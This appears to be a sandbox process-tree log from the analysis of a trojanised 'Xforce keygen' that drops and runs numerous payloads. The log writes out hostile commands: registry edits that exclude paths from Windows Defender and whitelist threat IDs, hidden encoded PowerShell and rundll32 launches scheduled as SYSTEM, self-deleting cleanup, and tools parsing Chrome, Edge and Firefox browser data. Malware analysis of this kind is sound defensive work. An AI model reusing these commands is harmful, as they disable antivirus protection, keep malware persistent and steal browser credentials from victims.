C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵PID:6564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
- Loads dropped DLL
PID:864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵PID:7896
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:64;"3⤵PID:5672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:324⤵PID:8000
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:325⤵PID:8524
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:644⤵PID:1852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TZXwQNgcU" /t REG_DWORD /d 0 /reg:324⤵PID:6632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TZXwQNgcU" /t REG_DWORD /d 0 /reg:644⤵PID:7484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mDMOhBxZSaUn" /t REG_DWORD /d 0 /reg:324⤵PID:7508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mDMOhBxZSaUn" /t REG_DWORD /d 0 /reg:644⤵PID:9032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nZosbjLfGLdU2" /t REG_DWORD /d 0 /reg:324⤵PID:6744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nZosbjLfGLdU2" /t REG_DWORD /d 0 /reg:644⤵PID:7964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR" /t REG_DWORD /d 0 /reg:324⤵PID:648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR" /t REG_DWORD /d 0 /reg:644⤵PID:9160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\otlZYwPmfIE" /t REG_DWORD /d 0 /reg:324⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\otlZYwPmfIE" /t REG_DWORD /d 0 /reg:644⤵PID:916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\achrhaRRbsGknaVB /t REG_DWORD /d 0 /reg:324⤵PID:7444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\achrhaRRbsGknaVB /t REG_DWORD /d 0 /reg:644⤵PID:7872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn /t REG_DWORD /d 0 /reg:324⤵PID:8992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn /t REG_DWORD /d 0 /reg:644⤵PID:7344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO /t REG_DWORD /d 0 /reg:324⤵PID:5864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO /t REG_DWORD /d 0 /reg:644⤵PID:6644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ptSbhgFrGptQLEdh /t REG_DWORD /d 0 /reg:324⤵PID:8440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ptSbhgFrGptQLEdh /t REG_DWORD /d 0 /reg:644⤵PID:5832
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gietEbdoP" /SC once /ST 13:44:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:5440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gietEbdoP"3⤵PID:8832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gietEbdoP"3⤵PID:7712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XLSdpNNRbetBaQhWL" /SC once /ST 07:44:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ptSbhgFrGptQLEdh\ieZzhueEAarlgmG\nnvAwWP.exe\" 7b /site_id 754 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:7332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XLSdpNNRbetBaQhWL"3⤵PID:2872
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:9180
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:8560
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:8324
-
-
-
C:\Windows\Temp\ptSbhgFrGptQLEdh\ieZzhueEAarlgmG\nnvAwWP.exeC:\Windows\Temp\ptSbhgFrGptQLEdh\ieZzhueEAarlgmG\nnvAwWP.exe 7b /site_id 754 /S2⤵PID:6652
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bmIXAqnwlcZKDlfrrr"3⤵PID:9088
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:9332
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:9420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:9468
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:9516
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TZXwQNgcU\CcLMEB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NzcAGdTAXLwThnE" /V1 /F3⤵
- Creates scheduled task(s)
PID:9552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NzcAGdTAXLwThnE2" /F /xml "C:\Program Files (x86)\TZXwQNgcU\YXZVGYP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:9644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NzcAGdTAXLwThnE"3⤵PID:9688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NzcAGdTAXLwThnE"3⤵PID:9764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KZNhLgVclRIcrY" /F /xml "C:\Program Files (x86)\nZosbjLfGLdU2\QFskRgz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:9816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UgXiIzMCLiXbI2" /F /xml "C:\ProgramData\achrhaRRbsGknaVB\wCwGrxk.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:9864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NlpgMlJPLJUUIQgya2" /F /xml "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\xORtTRX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:9900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RrbJEmJiwUZfNkwHAcI2" /F /xml "C:\Program Files (x86)\EvBjrtBtUyzDC\uKwYZnD.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:9944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mKAnOptukZFflVQii" /SC once /ST 10:29:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ptSbhgFrGptQLEdh\MehnsGYr\zPeVttA.dll\",#1 /site_id 754" /V1 /F3⤵
- Creates scheduled task(s)
PID:10020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mKAnOptukZFflVQii"3⤵PID:10080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuHVOseNaxy" /SC once /ST 13:58:57 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\vIwEAPsL\KTPqmFD.exe\" wv /S"3⤵
- Creates scheduled task(s)
PID:10144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuHVOseNaxy"3⤵PID:6792
-
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\ptSbhgFrGptQLEdh\MehnsGYr\zPeVttA.dll",#1 /site_id 7542⤵PID:10116
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\ptSbhgFrGptQLEdh\MehnsGYr\zPeVttA.dll",#1 /site_id 7543⤵PID:10132
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mKAnOptukZFflVQii"4⤵PID:8432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\vIwEAPsL\KTPqmFD.exeC:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\vIwEAPsL\KTPqmFD.exe wv /S2⤵PID:9308
-
-
C:\Users\Admin\AppData\Local\80b5ca2a-efdd-4f40-a449-57f2448d0017\63BF.exeC:\Users\Admin\AppData\Local\80b5ca2a-efdd-4f40-a449-57f2448d0017\63BF.exe --Task2⤵PID:6208
-
-
C:\Users\Admin\AppData\Roaming\ujbbsgsC:\Users\Admin\AppData\Roaming\ujbbsgs2⤵PID:4956
-
-
C:\Users\Admin\AppData\Local\80b5ca2a-efdd-4f40-a449-57f2448d0017\63BF.exeC:\Users\Admin\AppData\Local\80b5ca2a-efdd-4f40-a449-57f2448d0017\63BF.exe --Task2⤵PID:10904
-
-
C:\Users\Admin\AppData\Roaming\ujbbsgsC:\Users\Admin\AppData\Roaming\ujbbsgs2⤵PID:7504
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:360
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:3264 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵PID:4464
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
PID:1128
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4728
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Xforce_keygen_by_KeygenNinja.zip\Xforce_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Xforce_keygen_by_KeygenNinja.zip\Xforce_keygen_by_KeygenNinja.exe"1⤵PID:4512
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵PID:1524
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:4568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4988
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:2156 -
C:\Users\Admin\AppData\Roaming\A430.tmp.exe"C:\Users\Admin\AppData\Roaming\A430.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4884 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\A430.tmp.exe"5⤵PID:5300
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:5612
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"4⤵
- Executes dropped EXE
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"5⤵PID:4828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 2725⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵PID:1336
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:4816
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:4484 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:5020
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2308
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
PID:3652 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:752 -
C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe" 1 3.1616940310.60608d1673967 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4384 -
C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WTKV8Z9VG9\multitimer.exe" 2 3.1616940310.60608d16739677⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\j4gwkwl5x54\5snr5w1i4po.exe"C:\Users\Admin\AppData\Local\Temp\j4gwkwl5x54\5snr5w1i4po.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\is-GVGBT.tmp\5snr5w1i4po.tmp"C:\Users\Admin\AppData\Local\Temp\is-GVGBT.tmp\5snr5w1i4po.tmp" /SL5="$40086,2592217,780800,C:\Users\Admin\AppData\Local\Temp\j4gwkwl5x54\5snr5w1i4po.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\is-CVON2.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-CVON2.tmp\winlthsth.exe"10⤵
- Executes dropped EXE
PID:5396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 80011⤵
- Program crash
PID:6036
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5y544auggyb\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\5y544auggyb\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\is-SLOJH.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-SLOJH.tmp\Setup3310.tmp" /SL5="$202DA,138429,56832,C:\Users\Admin\AppData\Local\Temp\5y544auggyb\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3584 -
C:\Users\Admin\AppData\Local\Temp\is-OSUIO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OSUIO.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4708 -
C:\Program Files (x86)\VR\Versium Research\customer5.exe"C:\Program Files (x86)\VR\Versium Research\customer5.exe"11⤵
- Executes dropped EXE
PID:2408 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6344 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b edge13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6312
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b chrome13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1288
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b firefox13⤵PID:2028
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\UgEwD2Otfx9I.exe"C:\Program Files (x86)\VR\Versium Research\UgEwD2Otfx9I.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4660 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:7088
-
-
-
C:\Program Files (x86)\VR\Versium Research\22.exe"C:\Program Files (x86)\VR\Versium Research\22.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5324 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:6420
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵
- Loads dropped DLL
PID:6076
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"11⤵
- Executes dropped EXE
PID:2412 -
C:\ProgramData\7256975.exe"C:\ProgramData\7256975.exe"12⤵
- Executes dropped EXE
PID:6688
-
-
C:\ProgramData\5000800.exe"C:\ProgramData\5000800.exe"12⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6712 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"13⤵
- Executes dropped EXE
PID:5168
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\lylal220.exe"C:\Program Files (x86)\VR\Versium Research\lylal220.exe"11⤵
- Executes dropped EXE
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\is-HDFTE.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-HDFTE.tmp\lylal220.tmp" /SL5="$3044E,491750,408064,C:\Program Files (x86)\VR\Versium Research\lylal220.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5756 -
C:\Users\Admin\AppData\Local\Temp\is-IIJU1.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-IIJU1.tmp\Microsoft.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
